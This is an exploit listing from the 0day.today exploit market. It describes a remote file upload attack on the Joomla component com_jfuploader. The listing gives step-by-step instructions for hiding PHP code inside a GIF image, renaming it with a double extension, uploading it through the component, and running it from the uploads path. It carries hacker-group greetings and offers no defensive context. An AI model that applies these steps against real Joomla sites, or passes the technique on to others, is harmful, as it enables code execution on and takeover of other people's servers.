[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_jfuploader Remote File Upload

Author
Setr0nix
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14641
Category
web applications
Date add
31-10-2010
Platform
php
==================================================
Joomla Component com_jfuploader Remote File Upload
==================================================

=========================================================================================================
[#]    Type    : Joomla Component com_jfuploader Remote File Upload
[#]    Author  : Setr0nix
[#]    Home    : www.Setr0nix.com
[#]    Contact : Admin@Setr0nix.com
=========================================================================================================
 
[#]    Exploit :
       1. Register
       2. http://127.0.0.1/index.php?option=com_jfuploader&Itemid=[Itemid]
       3. Download One gif Image ( Example : http://www.google.com/images/logo.gif )
       4. Open logo.gif In Notepad++ And Got to Last Line
       5. Copy And Past You PHP Code After The Last Line ( Don't Delete Any Thing Of Image Code )
       6. Save It , Ctrl + S
       7. Rename logo.gif To logo.php.gif And Upload It From com_jfuploader
       8. To Run Your Uploaded File Go To This Link : http://127.0.0.1/files/YourUsername/logo.php.gif

        
=========================================================================================================
[#]    S T T   :
       All Iranian Hackers , Offensive Security , Inj3ct0r , SecurityReason
=========================================================================================================



#  0day.today [2024-12-23]  #